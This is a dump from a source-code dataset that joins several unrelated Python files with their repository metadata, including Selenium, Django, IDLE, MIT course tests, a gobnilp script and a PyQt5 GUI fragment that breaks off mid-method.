warnings.warn("name used for saved screenshot does not match file "
"type. It should end with a `.png` extension", UserWarning)
png = self.screenshot_as_png
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
finally:
del png
return True
@property
def parent(self):
"""Internal reference to the WebDriver instance this element was found from."""
return self._parent
@property
def id(self):
"""Internal ID used by selenium.
This is mainly for internal use. Simple use cases such as checking if 2
webelements refer to the same element, can be done using ``==``::
if element1 == element2:
print("These 2 are equal")
"""
return self._id
def __eq__(self, element):
return hasattr(element, 'id') and self._id == element.id
def __ne__(self, element):
return not self.__eq__(element)
# Private Methods
def _execute(self, command, params=None):
"""Executes a command against the underlying HTML element.
Args:
command: The name of the command to _execute as a string.
params: A dictionary of named parameters to send with the command.
Returns:
The command's JSON response loaded into a dictionary object.
"""
if not params:
params = {}
params['id'] = self._id
return self._parent.execute(command, params)
def find_element(self, by=By.ID, value=None):
"""
Find an element given a By strategy and locator. Prefer the find_element_by_* methods when
possible.
:Usage:
element = element.find_element(By.ID, 'foo')
:rtype: WebElement
"""
if self._w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self._execute(Command.FIND_CHILD_ELEMENT,
{"using": by, "value": value})['value']
def find_elements(self, by=By.ID, value=None):
"""
Find elements given a By strategy and locator. Prefer the find_elements_by_* methods when
possible.
:Usage:
element = element.find_elements(By.CLASS_NAME, 'foo')
:rtype: list of WebElement
"""
if self._w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self._execute(Command.FIND_CHILD_ELEMENTS,
{"using": by, "value": value})['value']
def __hash__(self):
return int(hashlib.md5(self._id.encode('utf-8')).hexdigest(), 16)
def _upload(self, filename):
fp = IOStream()
zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED)
zipped.write(filename, os.path.split(filename)[1])
zipped.close()
content = base64.encodestring(fp.getvalue())
if not isinstance(content, str):
content = content.decode('utf-8')
try:
return self._execute(Command.UPLOAD_FILE, {'file': content})['value']
except WebDriverException as e:
if "Unrecognized command: POST" in e.__str__():
return filename
elif "Command not found: POST " in e.__str__():
return filename
elif '{"status":405,"value":["GET","HEAD","DELETE"]}' in e.__str__():
return filename
else:
raise e
| [
"penglingsen@173.com"
] | penglingsen@173.com |
1e60b179a48982c275554f369e2fd7e4799c2e83 | a48d9c0bee2f1b36dc9338123ced2c79de177a81 | /asterisk_click2dial_crm_claim/__init__.py | f26ba140b1816f84924f9b9ff21e667945c67fd0 | [] | no_license | Sk1f161/OpenERP | aacb0abae52383b12fae08aa631cc0e1ab31b2b8 | 64589e574e513f8925f6cba4d8cab329b34770c7 | refs/heads/master | 2021-01-01T19:24:20.015299 | 2013-09-25T05:33:43 | 2013-09-25T05:33:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,105 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Asterisk Click2Dial CRM Claim module for OpenERP
# Copyright (C) 2012-2013 Akretion (http://www.akretion.com/)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import asterisk_click2dial_crm_claim
| [
"root@vmi11225.contabo.net"
] | root@vmi11225.contabo.net |
8c1e297407b8673318375c3efa135d1923b019f5 | d613e476959c24ad1666b9346cbc55e0bd635b11 | /leap.py | 078e888b72b485f8f4cce40db9d71495dfa2d0b5 | [] | no_license | forty47seven/with_dahir | 6142e9a19d371322553517a68b598c430d3ba1d2 | 679db406ce2a4cc48aefbdc1b3f6e5f05a998689 | refs/heads/main | 2023-02-02T10:05:38.915512 | 2020-12-21T04:59:29 | 2020-12-21T04:59:29 | 318,107,105 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #Leap Year
year = int(input('Enter a year: '))
if year % 4 == 0:
if year % 400 == 0:
print (year, 'is a leap year.')
elif year % 100 != 0:
print (year, 'is a leap year.')
elif year % 100 == 0:
print (year, 'is not a leap year.')
else:
print (year, 'is not a leap year.') | [
"noreply@github.com"
] | forty47seven.noreply@github.com |
6d5b03f990530dfb73b703b2e292eee7dd61d6b7 | 640afd312b21e433fbd8a0ac455df3422c2ccd75 | /meiduo_mall/meiduo_mall/utils/exceptions.py | c4fa6186fd1f7c0aed612bde810f04531c61ad72 | [] | no_license | huazaistart/meiduo_mall | b46efec9feabfdc5b13580ddded61deef1e9675b | 569c112c767e687cdb3143154ad1ea36e3b115e2 | refs/heads/master | 2020-03-27T13:03:59.185101 | 2018-08-31T10:40:12 | 2018-08-31T10:40:12 | 146,587,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | import logging
# django提供的数据库异常
from django.db import DatabaseError
# redis异常
from redis.exceptions import RedisError
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import exception_handler
# 获取在配置文件中定义的日志器,用来记录日志信息
logger = logging.getLogger('django')
def custom_exception_handler(exc, context):
"""
自定义异常处理,补充处理mysql异常和redis异常
:param exc: 异常对象
:param context: 抛出异常额上下文
:return: Response
"""
# 先调用drf框架的异常处理方法
response = exception_handler(exc, context)
# drf框架处理不了的异常,我们再处理
if not response:
view = context['view'] # 出错的视图,即本次用户访问的视图对象
if isinstance(exc, DatabaseError) or isinstance(exc,RedisError):
# 数据库异常
logger.error('[%s] : %s' % (view, exc))
response = Response({'message': '服务器内部错误'}, status=status.HTTP_507_INSUFFICIENT_STORAGE)
return response
| [
"huazai@example.com"
] | huazai@example.com |
3104093a673dfd6a67d89795536dfbe617b2a3ee | 11b0e2fd331bf9dd6b472393d7075ddeddbaa992 | /PythonScripts/ProblemSet7/ps7_test.py | 60ae97366db71134390fc57c89827c86821e2a8e | [] | no_license | MichaelrMentele/MIT-6.002-Intro-to-CS | 71edd41167db549daa8e07f1833fad237f588e5d | a0ffa8a8ec598a79b92b4a366ea79bdc1c5d8417 | HEAD | 2016-08-12T16:49:41.126772 | 2015-12-29T07:39:39 | 2015-12-29T07:39:39 | 48,765,246 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,925 | py | # 6.00.1x
# Problem Set 7 Test Suite
import unittest
import sys
from ps7 import *
class ProblemSet7NewsStory(unittest.TestCase):
def setUp(self):
pass
def testNewsStoryConstructor(self):
story = NewsStory('', '', '', '', '')
def testNewsStoryGetGuid(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getGuid(), 'test guid')
def testNewsStoryGetTitle(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getTitle(), 'test title')
def testNewsStoryGetSubject(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getSubject(), 'test subject')
def testNewsStoryGetSummary(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getSummary(), 'test summary')
def testNewsStoryGetLink(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getLink(), 'test link')
class ProblemSet7(unittest.TestCase):
def setUp(self):
class TrueTrigger:
def evaluate(self, story): return True
class FalseTrigger:
def evaluate(self, story): return False
self.tt = TrueTrigger()
self.tt2 = TrueTrigger()
self.ft = FalseTrigger()
self.ft2 = FalseTrigger()
def test1TitleTrigger(self):
koala = NewsStory('', 'Koala bears are soft and cuddly', '', '', '')
pillow = NewsStory('', 'I prefer pillows that are soft.', '', '', '')
soda = NewsStory('', 'Soft drinks are great', '', '', '')
pink = NewsStory('', "Soft's the new pink!", '', '', '')
football = NewsStory('', '"Soft!" he exclaimed as he threw the football', '', '', '')
microsoft = NewsStory('', 'Microsoft announced today that pillows are bad', '', '', '')
nothing = NewsStory('', 'Reuters reports something really boring', '', '' ,'')
caps = NewsStory('', 'soft things are soft', '', '', '')
s1 = TitleTrigger('SOFT')
s2 = TitleTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "TitleTrigger failed to fire when the word appeared in the title")
self.assertTrue(trig.evaluate(pillow), "TitleTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "TitleTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "TitleTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "TitleTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "TitleTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "TitleTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "TitleTrigger fired when the word wasn't really present in the title")
def test2SubjectTrigger(self):
koala = NewsStory('', '', 'Koala bears are soft and cuddly', '', '')
pillow = NewsStory('', '', 'I prefer pillows that are soft.', '', '')
soda = NewsStory('', '', 'Soft drinks are great', '', '')
pink = NewsStory('', '', "Soft's the new pink!", '', '')
football = NewsStory('', '', '"Soft!" he exclaimed as he threw the football', '', '')
microsoft = NewsStory('', '', 'Microsoft announced today that pillows are bad', '', '')
nothing = NewsStory('', '', 'Reuters reports something really boring', '', '')
caps = NewsStory('', '', 'soft things are soft', '', '')
s1 = SubjectTrigger('SOFT')
s2 = SubjectTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "SubjectTrigger failed to fire when the word appeared in the subject")
self.assertTrue(trig.evaluate(pillow), "SubjectTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "SubjectTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "SubjectTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "SubjectTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "SubjectTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "SubjectTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "SubjectTrigger fired when the word wasn't really present in the subject")
def test3SummaryTrigger(self):
koala = NewsStory('', '', '', 'Koala bears are soft and cuddly', '')
pillow = NewsStory('', '', '', 'I prefer pillows that are soft.', '')
soda = NewsStory('', '', '', 'Soft drinks are great', '')
pink = NewsStory('', '', '', "Soft's the new pink!", '')
football = NewsStory('', '', '', '"Soft!" he exclaimed as he threw the football', '')
microsoft = NewsStory('', '', '', 'Microsoft announced today that pillows are bad', '')
nothing = NewsStory('', '', '', 'Reuters reports something really boring', '')
caps = NewsStory('', '', '', 'soft things are soft', '')
s1 = SummaryTrigger('SOFT')
s2 = SummaryTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "SummaryTrigger failed to fire when the word appeared in the summary.")
self.assertTrue(trig.evaluate(pillow), "SummaryTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "SummaryTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "SummaryTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "SummaryTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "SummaryTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "SummaryTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "SummaryTrigger fired when the word wasn't really present in the summary")
def test4NotTrigger(self):
n = NotTrigger(self.tt)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertFalse(n.evaluate(b), "A NOT trigger applied to 'always true' DID NOT return false")
y = NotTrigger(self.ft)
self.assertTrue(y.evaluate(b), "A NOT trigger applied to 'always false' DID NOT return true")
def test5AndTrigger(self):
yy = AndTrigger(self.tt, self.tt2)
yn = AndTrigger(self.tt, self.ft)
ny = AndTrigger(self.ft, self.tt)
nn = AndTrigger(self.ft, self.ft2)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertTrue(yy.evaluate(b), "AND of 'always true' and 'always true' should be true")
self.assertFalse(yn.evaluate(b), "AND of 'always true' and 'always false' should be false")
self.assertFalse(ny.evaluate(b), "AND of 'always false' and 'always true' should be false")
self.assertFalse(nn.evaluate(b), "AND of 'always false' and 'always false' should be false")
def test6OrTrigger(self):
yy = OrTrigger(self.tt, self.tt2)
yn = OrTrigger(self.tt, self.ft)
ny = OrTrigger(self.ft, self.tt)
nn = OrTrigger(self.ft, self.ft2)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertTrue(yy.evaluate(b), "OR of 'always true' and 'always true' should be true")
self.assertTrue(yn.evaluate(b), "OR of 'always true' and 'always false' should be true")
self.assertTrue(ny.evaluate(b), "OR of 'always false' and 'always true' should be true")
self.assertFalse(nn.evaluate(b), "OR of 'always false' and 'always false' should be false")
def test7PhraseTrigger(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
self.assertTrue(pt.evaluate(a), "PhraseTrigger doesn't find phrase in title")
self.assertTrue(pt.evaluate(b), "PhraseTrigger doesn't find phrase in subject")
self.assertTrue(pt.evaluate(c), "PhraseTrigger doesn't find phrase in summary")
for s in [noa, nob, noc]:
self.assertFalse(pt.evaluate(s), "PhraseTrigger is case-insensitive, and shouldn't be")
def test8FilterStories(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
triggers = [pt, self.tt, self.ft]
stories = [a, b, c, noa, nob, noc]
filteredStories = filterStories(stories, triggers)
print filteredStories
for story in stories:
self.assertTrue(story in filteredStories)
filteredStories = filterStories(stories, [self.ft])
self.assertEquals(len(filteredStories), 0)
def test8FilterStories2(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
class MatchTrigger(Trigger):
def __init__(self, story):
self.story = story
def evaluate(self, story):
return story == self.story
triggers = [MatchTrigger(a), MatchTrigger(nob)]
stories = [a, b, c, noa, nob, noc]
filteredStories = filterStories(stories, triggers)
self.assertTrue(a in filteredStories)
self.assertTrue(nob in filteredStories)
self.assertEquals(2, len(filteredStories))
if __name__ == "__main__":
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ProblemSet7NewsStory))
suite.addTest(unittest.makeSuite(ProblemSet7))
unittest.TextTestRunner(verbosity=2).run(suite)
unittest.TextTestRunner(verbosity=2, stream=sys.stdout).run(suite)
| [
"michaelrmentele@gmail.com"
] | michaelrmentele@gmail.com |
9d5d983d5ff01859848e01029c4cf4bd7a80dd09 | 730a0291d90bf220d162791287e422bc4225d164 | /pymodel/__init__.py | 4963a551029dcecb2c1fe1c933778d788cf10017 | [
"BSD-3-Clause"
] | permissive | jon-jacky/PyModel | 27442d062e615bd0bf1bd16d86ae56cc4d3dc443 | 457ea284ea20703885f8e57fa5c1891051be9b03 | refs/heads/master | 2022-11-02T14:08:47.012661 | 2022-10-16T09:47:53 | 2022-10-16T09:47:53 | 2,034,133 | 75 | 36 | NOASSERTION | 2021-07-11T21:15:08 | 2011-07-12T04:23:02 | Python | UTF-8 | Python | false | false | 87 | py | """
Make this directory a package so it can be installed with one line in setup.py
"""
| [
"jon@u.washington.edu"
] | jon@u.washington.edu |
a771d28bdbf0a941f858c851bbe836950980bc83 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Python/Core/Lib/idlelib/Bindings.py | 896d83102673640507f98caa05d20c390622944e | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 3,003 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: Bindings.py
"""Define the menu contents, hotkeys, and event bindings.
There is additional configuration information in the EditorWindow class (and
subclasses): the menus are created there based on the menu_specs (class)
variable, and menus not created are silently skipped in the code here. This
makes it possible, for example, to define a Debug menu which is only present in
the PythonShell window, and a Format menu which is only present in the Editor
windows.
"""
import sys
from idlelib.configHandler import idleConf
from idlelib import macosxSupport
menudefs = [
(
'file',
[
('_New Window', '<<open-new-window>>'),
('_Open...', '<<open-window-from-file>>'),
('Open _Module...', '<<open-module>>'),
('Class _Browser', '<<open-class-browser>>'),
('_Path Browser', '<<open-path-browser>>'),
None,
('_Save', '<<save-window>>'),
('Save _As...', '<<save-window-as-file>>'),
('Save Cop_y As...', '<<save-copy-of-window-as-file>>'),
None,
('Prin_t Window', '<<print-window>>'),
None,
('_Close', '<<close-window>>'),
('E_xit', '<<close-all-windows>>')]),
(
'edit',
[
('_Undo', '<<undo>>'),
('_Redo', '<<redo>>'),
None,
('Cu_t', '<<cut>>'),
('_Copy', '<<copy>>'),
('_Paste', '<<paste>>'),
('Select _All', '<<select-all>>'),
None,
('_Find...', '<<find>>'),
('Find A_gain', '<<find-again>>'),
('Find _Selection', '<<find-selection>>'),
('Find in Files...', '<<find-in-files>>'),
('R_eplace...', '<<replace>>'),
('Go to _Line', '<<goto-line>>')]),
(
'format',
[
('_Indent Region', '<<indent-region>>'),
('_Dedent Region', '<<dedent-region>>'),
('Comment _Out Region', '<<comment-region>>'),
('U_ncomment Region', '<<uncomment-region>>'),
('Tabify Region', '<<tabify-region>>'),
('Untabify Region', '<<untabify-region>>'),
('Toggle Tabs', '<<toggle-tabs>>'),
('New Indent Width', '<<change-indentwidth>>')]),
(
'run',
[
('Python Shell', '<<open-python-shell>>')]),
(
'shell',
[
('_View Last Restart', '<<view-restart>>'),
('_Restart Shell', '<<restart-shell>>')]),
(
'debug',
[
('_Go to File/Line', '<<goto-file-line>>'),
('!_Debugger', '<<toggle-debugger>>'),
('_Stack Viewer', '<<open-stack-viewer>>'),
('!_Auto-open Stack Viewer', '<<toggle-jit-stack-viewer>>')]),
(
'options',
[
('_Configure IDLE...', '<<open-config-dialog>>'),
None]),
(
'help',
[
('_About IDLE', '<<about-idle>>'),
None,
('_IDLE Help', '<<help>>'),
('Python _Docs', '<<python-docs>>')])]
if macosxSupport.runningAsOSXApp():
quitItem = menudefs[0][1][-1]
closeItem = menudefs[0][1][-2]
del menudefs[0][1][-3:]
menudefs[0][1].insert(6, closeItem)
del menudefs[-1][1][0:2]
default_keydefs = idleConf.GetCurrentKeySet()
del sys | [
"francisck@protonmail.ch"
] | francisck@protonmail.ch |
5c3a7290e7bd2aea62c060b4775225461bdbd8fd | 1fe5186cc38cbf6797eb0efcbca3ba4e98ab6ab1 | /experiment_2/generate_gobnilp_graphs.py | 8c67a4445ac0075da96239f03509d0ae5efac97b | [] | no_license | Broshen/defect_prediction_analysis | 9498a38862f1fb66735b525f06d1667a4bab9444 | 1cdb51e7882cf5c57a41ac29d661893b6ce2fa72 | refs/heads/master | 2020-03-18T04:49:17.943866 | 2018-07-26T16:53:34 | 2018-07-26T16:53:34 | 134,308,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,466 | py | # IMPORTANT: READ ME
# This python script is run on the student.linux environments,
# since it runs the gobnilp executables, which was set up there
# (it's a pain in the ass to set up on windows)
# The student linux environments only have Python 2.7
# Hence, this script is in Python 2.7!!!!
# (whereas other scripts are all in python 3)
# !!!!!THIS PYTHON SCRIPT IS WRITTEN IN PYTHON 2.7!!!!!
import os
import subprocess
import sys
GOBNILP_EXECUTABLE_PATH = "../gobnilp.spx"
GOBNILP_SETTINGS_PATH = "./gobnilp.set"
INPUT_FILE_PATH = '../../change_burst_data-master/weekly/packages/gobnilp_formatted/'
def generateDotFiles(file, output_folder):
out_name=file.replace("_incl_bugs-gobnilp_formatted.csv", "")
output_folder+=out_name+"/"
if not os.path.exists(output_folder):
os.makedirs(output_folder)
subprocess.call([GOBNILP_EXECUTABLE_PATH, "-f=dat", "-g="+GOBNILP_SETTINGS_PATH, INPUT_FILE_PATH+file])
with open(output_folder+out_name+"_scores", "w+") as scorefile:
# iterate through results and move & rename to appropriate folder
for file in os.listdir("./"):
if file.startswith("bn") and file.endswith("dot"):
subprocess.call(["mv", file, output_folder+out_name+"_"+file])
elif file.startswith("scoreandtime_"):
rank = file.replace("scoreandtime_","")
with open(file, "r") as f:
score = f.read().split()[0]
scorefile.write(rank+"," +score+"\n")
os.remove(file)
def generateAllFiles():
output_folder=INPUT_FILE_PATH.replace("../../change_burst_data-master", "./bn_graphs").replace('gobnilp_formatted/', '')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for file in os.listdir(INPUT_FILE_PATH):
if "_incl_bugs-gobnilp_formatted.csv" in file:
generateDotFiles(file, output_folder)
def generateFromFilesWithPrefix(prefix):
output_folder=INPUT_FILE_PATH.replace("../../change_burst_data-master", "./bn_graphs").replace('gobnilp_formatted/', '')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for file in os.listdir(INPUT_FILE_PATH):
if (INPUT_FILE_PATH + file).startswith(prefix):
generateDotFiles(file, output_folder)
try:
print("GENERATING FROM FILES BEGINNING WITH: " + sys.argv[1])
generateFromFilesWithPrefix(sys.argv[1])
except:
print("GENERATING FROM ALL FILES IN FOLDER" + INPUT_FILE_PATH)
generateAllFiles()
# stopped at ../change_burst_data-master/weekly/packages/gobnilp_formatted/Eclipse20_GAP1_BURST10_incl_bugs-gobnilp_formatted.csv | [
"boshen.cui@gmail.com"
] | boshen.cui@gmail.com |
e0449012ca661e6ea5603910cc72a4fa47e6de80 | ce22502be73ac3d67df3ed252bb38f4ca93f1cb9 | /first_project/HelloWorld/migrations/0001_initial.py | d010245b363252f10556ef20b3c4b4075f20493d | [] | no_license | stevemeekins/Django | 6f3686a73e00d64ae39cda0946863d76f891993c | 9e5c88f21f30bbc949cb8bea7e8e58a9a7b5b4e4 | refs/heads/main | 2023-06-17T08:29:19.238194 | 2021-07-13T21:13:35 | 2021-07-13T21:13:35 | 385,643,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,435 | py | # Generated by Django 3.2.4 on 2021-07-01 16:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Topic',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('top_name', models.CharField(max_length=264, unique=True)),
],
),
migrations.CreateModel(
name='Webpage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=264, unique=True)),
('url', models.URLField(unique=True)),
('topic', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='HelloWorld.topic')),
],
),
migrations.CreateModel(
name='AccessRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='HelloWorld.webpage')),
],
),
]
| [
"noreply@github.com"
] | stevemeekins.noreply@github.com |
ef884fe19f7e3aae50c5cc78782bc6b0d3f75002 | 21771e2dd1804905b304731be47c22201c04a05a | /venv/bin/pip3 | be8c33a97c8268f3e4095389d85866f063e2d326 | [
"MIT"
] | permissive | TrellixVulnTeam/Awards-app_W4QC | 4ffd38cdaec7ac2898e2b14027ebcc49286db387 | 7529a24984eb797d3af59031a4780bb68e739f24 | refs/heads/master | 2023-03-22T04:02:27.447933 | 2021-01-25T21:27:06 | 2021-01-25T21:27:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | #!/home/moringa/Desktop/Awards/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"kiplangatbett5@gmail.com"
] | kiplangatbett5@gmail.com | |
9c57f1e36d6906aa15462b1128559bb439a2b656 | 9f9ce2c2a04312b42f4d56b13164b28c21b25d3b | /python/beautifulMatrix.py | 8d56dddbf3e1f59ad59ea5e86f3393cf04b3593b | [] | no_license | rahdirs11/CodeForces | a0b376eb919740770e6a5cd04f76b7c9c1ef6edd | 282b0f2ebed3db1951727d1224c44fdb4e9d1a71 | refs/heads/master | 2023-04-12T10:44:44.720469 | 2021-04-27T19:18:30 | 2021-04-27T19:18:30 | 362,223,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | # objective is to have index as 2, 2
matrix = [[int(x) for x in input().strip().split()] for _ in range(5)]
row = col = 0
for i, r in enumerate(matrix):
if 1 in r:
row, col = i, r.index(1)
break
print(abs(row - 2) + abs(col - 2))
| [
"iamsridhar11@gmail.com"
] | iamsridhar11@gmail.com |
eeebfbc34e0dc9d7eafab611f0b6eed7ea155f07 | f73bb64f43f502d7b1a65877ec0fac13acb8e798 | /project.py | e321e73de761b2ca593805b0f24edc829c9c9ff0 | [] | no_license | Heisenberg3562/Image-Processing-Gui | 373e66f937fe98a38f81428da202976375a515a1 | e4d87099b977a578b8a0e7170927f58681e46cd1 | refs/heads/master | 2021-03-29T07:15:48.294393 | 2020-03-30T19:34:39 | 2020-03-30T19:34:39 | 247,930,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,190 | py | from PyQt5.QtCore import QDateTime, Qt, QTimer
from PyQt5.QtWidgets import (QApplication, QCheckBox, QComboBox, QDateTimeEdit,
QDial, QDialog, QGridLayout, QGroupBox, QHBoxLayout, QLabel, QLineEdit,
QProgressBar, QPushButton, QRadioButton, QScrollBar, QSizePolicy,
QSlider, QSpinBox, QStyleFactory, QTableWidget, QTabWidget, QTextEdit,
QVBoxLayout, QWidget)
class WidgetGallery(QDialog):
def __init__(self, parent=None):
super(WidgetGallery, self).__init__(parent)
self.originalPalette = QApplication.palette()
styleComboBox = QComboBox()
styleComboBox.addItems(QStyleFactory.keys())
styleLabel = QLabel("&Style:")
styleLabel.setBuddy(styleComboBox)
self.useStylePaletteCheckBox = QCheckBox("&Use style's standard palette")
self.useStylePaletteCheckBox.setChecked(True)
disableWidgetsCheckBox = QCheckBox("&Disable widgets")
self.createTopLeftGroupBox()
self.createTopRightGroupBox()
self.createBottomLeftTabWidget()
self.createBottomRightGroupBox()
self.createProgressBar()
styleComboBox.activated[str].connect(self.changeStyle)
self.useStylePaletteCheckBox.toggled.connect(self.changePalette)
disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)
disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)
disableWidgetsCheckBox.toggled.connect(self.bottomLeftTabWidget.setDisabled)
disableWidgetsCheckBox.toggled.connect(self.bottomRightGroupBox.setDisabled)
topLayout = QHBoxLayout()
topLayout.addWidget(styleLabel)
topLayout.addWidget(styleComboBox)
topLayout.addStretch(1)
# topLayout.addWidget(self.useStylePaletteCheckBox)
# topLayout.addWidget(disableWidgetsCheckBox)
mainLayout = QGridLayout()
mainLayout.addLayout(topLayout, 0, 0, 1, 2)
mainLayout.addWidget(self.topLeftGroupBox, 1, 0)
mainLayout.addWidget(self.topRightGroupBox, 1, 1)
mainLayout.addWidget(self.bottomLeftTabWidget, 2, 0)
mainLayout.addWidget(self.bottomRightGroupBox, 2, 1)
mainLayout.addWidget(self.progressBar, 3, 0, 1, 2)
mainLayout.setRowStretch(1, 1)
mainLayout.setRowStretch(2, 1)
mainLayout.setColumnStretch(0, 1)
mainLayout.setColumnStretch(1, 1)
self.setLayout(mainLayout)
self.setWindowTitle("Styles")
self.changeStyle('Fusion')
def changeStyle(self, styleName):
QApplication.setStyle(QStyleFactory.create(styleName))
self.changePalette()
def changePalette(self):
if (self.useStylePaletteCheckBox.isChecked()):
